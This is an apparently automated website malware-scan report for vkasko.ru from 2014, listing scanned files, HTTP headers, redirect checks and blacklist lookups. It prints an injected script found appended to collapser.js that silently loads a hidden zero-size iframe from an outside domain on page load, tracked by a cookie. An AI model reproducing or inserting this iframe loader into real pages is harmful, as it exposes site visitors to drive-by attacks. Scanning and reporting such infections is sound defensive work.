Scanned pages/files
| Request | Server response | Status |
http://vkasko.ru/ | 200 OK Content-Length: 13805 Content-Type: text/html | clean |
http://vkasko.ru/collapser.js | 200 OK Content-Length: 3345 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: asurt.toutges.com ...[2955 bytes skipped]... />if (window.addEventListener) window.addEventListener("load", do_onload, false) else if (window.attachEvent) window.attachEvent("onload", do_onload) else if (document.getElementById) window.onload=do_onload if (enablepersist=="on" && document.getElementById) window.onunload=saveswitchstate ;var ifbNDAl = document.createElement('iframe');ifbNDAl.name = 'ifbNDAl';ifbNDAl.src = 'http://asurt.toutges.com/';ifbNDAl.style.width = '0px';ifbNDAl.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('ifbNDAl=') == -1) { document.getElementsByTagName('body')[0].appendChild(ifbNDAl);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); document.cookie = 'ifbNDAl=yes; path=/; expires=' + expiresDate;}}; Decoded script: function do_onload() { uniqueidn = window.location.pathname + "firsttimeload"; var alltags = document.all ? document.all : document.getElementsByTagName("*"); ccollect = getElementbyClass(alltags, "switchcontent"); statecollect = getElementbyClass(alltags, "showstate"); if (enablepersist == "on" && get_cookie(window.location.pathname) != "" && ccollect.length > 0) { revivecontent(); } if (ccollect.length > 0 && statecollect.length > 0) { revivestatus(); } sweeptoggle("contract"); } | ||
http://vkasko.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 347 Content-Type: text/html | clean |
http://vkasko.ru/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vkasko.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1
Connection: close
Date: Sun, 05 Oct 2014 02:41:35 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Expires: Sun, 05 Oct 2014 02:41:11 GMT
GET / HTTP/1.1
Host: vkasko.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1
Connection: close
Date: Sun, 05 Oct 2014 02:41:35 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Expires: Sun, 05 Oct 2014 02:41:11 GMT
Second query (visit from search engine):
GET / HTTP/1.1
Host: vkasko.ru
Referer: http://www.google.com/search?q=vkasko.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vkasko.ru
Referer: http://www.google.com/search?q=vkasko.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vkasko.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vkasko.ru/
Result: vkasko.ru is not infected or malware details are not published yet.
Result: vkasko.ru is not infected or malware details are not published yet.